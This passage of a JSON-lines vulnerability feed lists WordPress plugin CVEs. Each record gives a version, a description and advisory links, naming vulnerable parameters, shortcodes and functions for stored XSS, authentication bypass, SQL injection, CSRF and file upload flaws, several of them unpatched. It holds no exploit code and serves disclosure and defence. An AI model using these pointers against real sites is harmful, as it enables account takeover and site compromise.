replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d6f9c80-ef86-4910-a88e-98f2b444ee30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d6f9c80-ef86-4910-a88e-98f2b444ee30?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-viewer-for-elementor\\\/trunk\\\/widgets\\\/pdfjs-viewer.php#L215\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-viewer-for-elementor\\\/trunk\\\/widgets\\\/pdfjs-viewer.php#L215\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-viewer-for-elementor\\\/trunk\\\/widgets\\\/pdfjs-viewer.php#L219\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-viewer-for-elementor\\\/trunk\\\/widgets\\\/pdfjs-viewer.php#L219\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-viewer-for-elementor\\\/trunk\\\/widgets\\\/pdf-viewer.php#L256\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-viewer-for-elementor\\\/trunk\\\/widgets\\\/pdf-viewer.php#L256\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-viewer-for-elementor\\\/trunk\\\/widgets\\\/pdf-viewer.php#L260\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-viewer-for-elementor\\\/trunk\\\/widgets\\\/pdf-viewer.php#L260\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5802","slug":"mts-url-shortener","versionImpact":"1.0.17","description":"The URL Shortener by Myhop WordPress plugin through 1.0.17 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cd37f702-9144-4c98-9b08-c63e510cd97f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cd37f702-9144-4c98-9b08-c63e510cd97f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8108","slug":"share-this-image","versionImpact":"2.01","description":"The Share This Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'alignment' parameter in all versions up to, and including, 2.01 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cb5368f-99b1-43e3-a2e4-67e90c8edfcf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cb5368f-99b1-43e3-a2e4-67e90c8edfcf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.01\\\/includes\\\/modules\\\/gutenberg\\\/class-sti-gutenberg-init.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.01\\\/includes\\\/modules\\\/gutenberg\\\/class-sti-gutenberg-init.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/share-this-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/share-this-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.01\\\/includes\\\/modules\\\/gutenberg\\\/sti-gutenberg-buttons.js#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.01\\\/includes\\\/modules\\\/gutenberg\\\/sti-gutenberg-buttons.js#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.01\\\/includes\\\/modules\\\/gutenberg\\\/sti-gutenberg-buttons.js#L146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.01\\\/includes\\\/modules\\\/gutenberg\\\/sti-gutenberg-buttons.js#L146\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3144334\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3144334\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9127","slug":"sola-testimonials","versionImpact":"3.0.0","description":"The Super Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018alignment\u2019 parameter in all versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54998b69-7dc5-49a4-8b8b-3419de73ed47?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54998b69-7dc5-49a4-8b8b-3419de73ed47?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sola-testimonials\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sola-testimonials\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sola-testimonials\\\/trunk\\\/includes\\\/gutenberg-blocks\\\/single-testimonial\\\/index.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sola-testimonials\\\/trunk\\\/includes\\\/gutenberg-blocks\\\/single-testimonial\\\/index.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sola-testimonials\\\/trunk\\\/includes\\\/gutenberg-blocks\\\/single-testimonial\\\/index.php#L84\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sola-testimonials\\\/trunk\\\/includes\\\/gutenberg-blocks\\\/single-testimonial\\\/index.php#L84\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11775","slug":"particle-background","versionImpact":"1.0.2","description":"The Particle Background plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'particleground' shortcode in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/particle-background\\\/trunk\\\/particleground.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/particle-background\\\/trunk\\\/particleground.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/particle-background\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/particle-background\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42cf84d1-37f5-41c1-838d-67244f17c55d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42cf84d1-37f5-41c1-838d-67244f17c55d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13182","slug":"wp-directorybox-manager","versionImpact":"2.5","description":"The WP Directorybox Manager plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 2.5. This is due to incorrect authentication in the 'wp_dp_parse_request' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/wp-directorybox-manager\\\/elements\\\/login\\\/cs-social-login\\\/cs-social-login.php#L43\",\"name\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/wp-directorybox-manager\\\/elements\\\/login\\\/cs-social-login\\\/cs-social-login.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea9e5e5d-a7fc-4159-a2ae-610bee76f818?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea9e5e5d-a7fc-4159-a2ae-610bee76f818?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1757","slug":"uber-grid","versionImpact":"1.1.7","description":"The WordPress Portfolio Builder \u2013 Portfolio Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'pfhub_portfolio' and 'pfhub_portfolio_portfolio' shortcodes in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/trunk\\\/src\\\/Frontend.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/trunk\\\/src\\\/Frontend.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/trunk\\\/src\\\/Frontend.php#L542\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/trunk\\\/src\\\/Frontend.php#L542\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36dcf1c4-1e0a-4ab6-a1b3-a9fe3aaddd0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36dcf1c4-1e0a-4ab6-a1b3-a9fe3aaddd0b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7197","slug":"wordpress-twitterbot","versionImpact":"1.11","description":"The Marketing Twitter Bot WordPress plugin through 1.11 does not have a CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make a logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26deaa7c-e331-42a0-9310-31d08871154c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26deaa7c-e331-42a0-9310-31d08871154c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5336","slug":"click-to-chat-for-whatsapp","versionImpact":"4.22","description":"The Click to Chat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018data-no_number\u2019 parameter in all versions up to, and including, 4.22 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/4.22\\\/new\\\/inc\\\/assets\\\/js\\\/dev\\\/app.dev.js#L126\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/4.22\\\/new\\\/inc\\\/assets\\\/js\\\/dev\\\/app.dev.js#L126\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/4.22\\\/new\\\/inc\\\/assets\\\/js\\\/dev\\\/app.dev.js#L818\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/click-to-chat-for-whatsapp\\\/tags\\\/4.22\\\/new\\\/inc\\\/assets\\\/js\\\/dev\\\/app.dev.js#L818\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309693\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309693\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/click-to-chat-for-whatsapp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/click-to-chat-for-whatsapp\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83695ac4-a08b-4c25-ac33-d9b7498f5a2c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83695ac4-a08b-4c25-ac33-d9b7498f5a2c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7648","slug":"ruven-themes-shortcodes","versionImpact":"1.0","description":"The Ruven Themes: Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ruven_button' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ruven-themes-shortcodes\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ruven-themes-shortcodes\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1794ef89-3949-44b4-9d42-80cd827ef730?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1794ef89-3949-44b4-9d42-80cd827ef730?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4333","slug":"wp-statistics","versionImpact":"13.1.1","description":"The WP Statistics plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 13.1.1. This is due to missing or incorrect nonce validation on the view() function. This makes it possible for unauthenticated attackers to activate and deactivate arbitrary plugins, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/215937d9-739b-4198-b375-6d171bbac64a\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/215937d9-739b-4198-b375-6d171bbac64a\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2626597%40wp-statistics&new=2626597%40wp-statistics&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2626597%40wp-statistics&new=2626597%40wp-statistics&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1510","slug":"shortcodes-ultimate","versionImpact":"7.0.2","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's su_tooltip shortcode in all versions up to, and including, 7.0.2 due to insufficient input sanitization and output escaping on user supplied attributes and user supplied tags. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee03d780-076b-4501-a353-376198a4bd7b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee03d780-076b-4501-a353-376198a4bd7b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.0.2\\\/includes\\\/shortcodes\\\/tooltip.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.0.2\\\/includes\\\/shortcodes\\\/tooltip.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037436\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/tooltip.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037436\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/tooltip.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2126","slug":"themeisle-companion","versionImpact":"2.10.32","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Registration Form widget in all versions up to, and including, 2.10.32 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/020052ba-dece-4e70-88e7-8bd8918b8376?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/020052ba-dece-4e70-88e7-8bd8918b8376?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046442\\\/themeisle-companion\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046442\\\/themeisle-companion\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9125","slug":"king-ie","versionImpact":"1.0","description":"The king_IE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/486f43cc-cc3f-4a63-b00f-86f29a391269?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/486f43cc-cc3f-4a63-b00f-86f29a391269?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/king-ie\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/king-ie\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5578","slug":"table-of-contents-plus","versionImpact":"2408","description":"The Table of Contents Plus WordPress plugin through 2408 does not sanitise and escape some of its settings, which could allow high privilege users such as editors to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/641e4fc3-4214-4c2e-8245-15e9dcdd37b4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/641e4fc3-4214-4c2e-8245-15e9dcdd37b4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10177","slug":"beds24-online-booking","versionImpact":"2.0.26","description":"The Beds24 Online Booking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's beds24-link shortcode in all versions up to, and including, 2.0.26 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/beds24-online-booking\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/beds24-online-booking\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2a6d017-93e4-40c6-a7d1-07e00faecf36?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2a6d017-93e4-40c6-a7d1-07e00faecf36?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-48332","slug":"wp-mail-bank","versionImpact":"4.0.14","description":"Missing Authorization vulnerability in Tech Banker Mail Bank - #1 Mail SMTP Plugin for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Mail Bank - #1 Mail SMTP Plugin for WordPress: from n\/a through 4.0.14.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-mail-bank\\\/vulnerability\\\/wordpress-mail-bank-1-mail-smtp-plugin-for-wordpress-plugin-4-0-14-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-mail-bank\\\/vulnerability\\\/wordpress-mail-bank-1-mail-smtp-plugin-for-wordpress-plugin-4-0-14-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11774","slug":"outdooractive-embed","versionImpact":"1.5","description":"The Outdooractive Embed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'list2go' shortcode in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/outdooractive-embed\\\/trunk\\\/shortcodes.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/outdooractive-embed\\\/trunk\\\/shortcodes.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/outdooractive-embed\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/outdooractive-embed\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d152271f-af5c-4faf-9945-483b69b716f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d152271f-af5c-4faf-9945-483b69b716f2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13095","slug":"wp-triggers-lite","versionImpact":"2.5.3","description":"The WP Triggers Lite WordPress plugin through 2.5.3 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/74e95fb5-025b-4d4d-a279-844b6ee3e57d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/74e95fb5-025b-4d4d-a279-844b6ee3e57d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2279","slug":"robo-maps","versionImpact":"1.0.6","description":"The Maps WordPress plugin through 1.0.6 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cd87d7ba-86e9-45b6-a3cd-11f6486f0bd0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cd87d7ba-86e9-45b6-a3cd-11f6486f0bd0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4279","slug":"external-image-replace","versionImpact":"1.0.8","description":"The External image replace plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'external_image_replace_get_posts::replace_post' function in all versions up to, and including, 1.0.8. This makes it possible for authenticated attackers, with contributor-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/external-image-replace\\\/tags\\\/1.0.8\\\/class.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/external-image-replace\\\/tags\\\/1.0.8\\\/class.php#L87\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee1624fd-d98b-4953-99dc-a952dda48aa1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee1624fd-d98b-4953-99dc-a952dda48aa1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7196","slug":"ultimate-noindex-nofollow-tool","versionImpact":"1.1.2","description":"The Ultimate Noindex Nofollow Tool WordPress plugin through 1.1.2 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15ea1ffd-5a0c-422c-8c9c-7b632516a156\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15ea1ffd-5a0c-422c-8c9c-7b632516a156\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4592","slug":"ai-image-generator-lab","versionImpact":"1.0.6","description":"The AI Image Lab \u2013 Free AI Image Generator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.6. This is due to missing or incorrect nonce validation on the 'wpz-ai-images' page. This makes it possible for unauthenticated attackers to update the plugin's API key via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-image-generator-lab\\\/trunk\\\/includes\\\/admin\\\/admin-page.php#L3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-image-generator-lab\\\/trunk\\\/includes\\\/admin\\\/admin-page.php#L3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61d56713-59af-4ad9-8744-6c6a5e5fe213?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61d56713-59af-4ad9-8744-6c6a5e5fe213?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
